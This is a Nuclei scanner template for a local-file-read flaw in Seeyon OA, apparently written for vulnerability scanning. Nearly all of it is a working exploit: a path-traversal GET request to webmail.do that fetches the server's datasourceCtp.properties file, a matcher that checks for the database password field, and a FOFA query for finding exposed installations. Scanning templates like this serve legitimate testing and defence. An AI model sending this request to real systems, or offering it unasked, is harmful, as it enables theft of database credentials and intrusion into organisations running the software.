id: seeyon-oa-file-read

info:
  name: Seeyon OA File Read
  author: zp857
  severity: medium
  reference: https://moresec.yuque.com/iixlqz/wnv3e6/hx1eyd
  tags: seeyon-oa,lfi
  metadata:
    fofa-query: 'app="致远互联-OA" || app="Seeyon-Server"|| app="用友-致远OA" || (server="Seeyon-Server") || (body="/seeyon/USER-DATA/IMAGES/LOGIN/login.gif" || title="用友致远A" || body="/yyoa/" || header="path=/yyoa" || server=="SY8044" || (body="A6-V5企业版" && body="seeyon" && body="seeyonProductId") || (body="/seeyon/common/") || (body="A8-V5企业版" && body="/seeyon/"))'

requests:
  - method: GET
    path:
      - "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/x-msdownload"

      - type: word
        words:
          - "ctpDataSource.password"

      - type: status
        status:
          - 200